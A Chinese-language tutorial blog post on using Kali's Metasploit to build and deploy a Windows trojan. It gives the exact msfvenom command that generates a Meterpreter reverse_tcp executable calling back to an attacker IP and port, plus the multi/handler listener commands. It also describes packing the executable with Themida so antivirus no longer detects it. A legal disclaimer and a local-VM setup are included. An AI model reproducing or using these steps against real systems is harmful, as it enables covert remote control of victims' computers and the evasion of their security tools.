网络攻防——kali操作系统基本使用
本文所述的木马具有一定的攻击性,请在使用时遵守与网络安全相关的法律法规(恶意攻击操作系统属于违法行为)。
2.环境安装
生成木马主要需要以下工具:kali操作系统,VMware15(用于搭建kali操作系统环境,以防止影响自己的Windows系统的正常运行),Themida(免杀加壳工具,以防止被电脑或手机的安全工具查杀)。
2.1 VMware15的下载
VMware15的下载和安装可以参考以下文章:VMware15的下载安装教程
2.2 kali操作系统的下载与虚拟机创建
kali操作系统的下载链接:[链接],我们选择VMware,右边的是mac电脑的。
通过使用迅雷加速下载,下载完成后的文件如下所示:
需要注意的是,这里下载的是一个虚拟机,直接在VMware中打开即可(是打开!),不是镜像文件哦。安装成功的结果如下所示:
2.3 Themida的下载安装
Themida的下载和安装可以参考以下文章:Themida的下载
注:可能你觉得我需要逐步说明安装教程,包括卸载环境和重新安装环境,但是这样的工作量太大了,可能会占用一些不必要的时间。天天教安装也没什么意思,但需要明白一点,安装环境是开发的重要一步,也是入门的最基础一步。如果不会安装环境,多搜索一下就会了,也不用着急。
3.利用kali操作系统的metasploit攻击Windows操作系统
正片开始,登录kali操作系统(默认账户名和密码都是:kali),打开终端,输入sudo su(切换到管理员身份,密码还是kali),如下所示:
msfconsole init //(初始化metasploit数据库)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.128 lport=9999 -f exe -o demo.exe
接下来依次输入以下指令:
新开一个终端,输入ip address获取虚拟机的IP地址:
接下来回到上一个终端,输入以下指令:
注:-p表示攻击载荷,表示说明这个程序需要载入什么功能,这里是windows/x64/meterpreter/reverse_tcp(开始操作系统的远程连接服务),后面的是远程连接的执行主机和该连接使用的端口,-f表示生成的文件格式,-o表示output(生成),demo.exe表示生成的文件名称。接下来就可以找到生成的木马程序了:
use exploit/multi/handler(使用exploit里面的处理程序模块)
set payload windows/x64/meterpreter/reverse_tcp(设置靶机中开启的服务)
set lhost 192.168.58.128(设置靶机中该服务权限的使用者)
set lport 9999(靶机中连接使用的端口)
run
特别说明,可能你在这个地方没有看到生成的文件,这是因为生成的文件可能在root目录下,有些时候也在kali目录下,所以如果没有的话,直接点击右键,选择open as Root:
程序需要等待靶机的执行即可。
接下来,将虚拟机中的demo.exe放入Windows中,但是会立即被杀掉:
但是对于一个程序而言,杀毒软件也同样是软件,有些软件不能被杀掉是因为有着特殊的加壳处理,保护了程序不被杀掉,常见的就比如Themida。
恢复之后需要确保火绒依然能够识别该病毒。
完成之后,杀一下生成的保护文件:
接下来就可以使用病毒程序了,Windows执行病毒程序,然后…
如果需要拍照或者视频录像,从事非法操作,请注意,我这里使用的是本机虚拟机,如果使用的是装有kali操作系统的服务器,那就有点恐怖了。
最后,对于英语困难户,可以参考这个汉化教程哦,亲测有效:kali汉化教程
3.参考文献
(1)kali汉化教程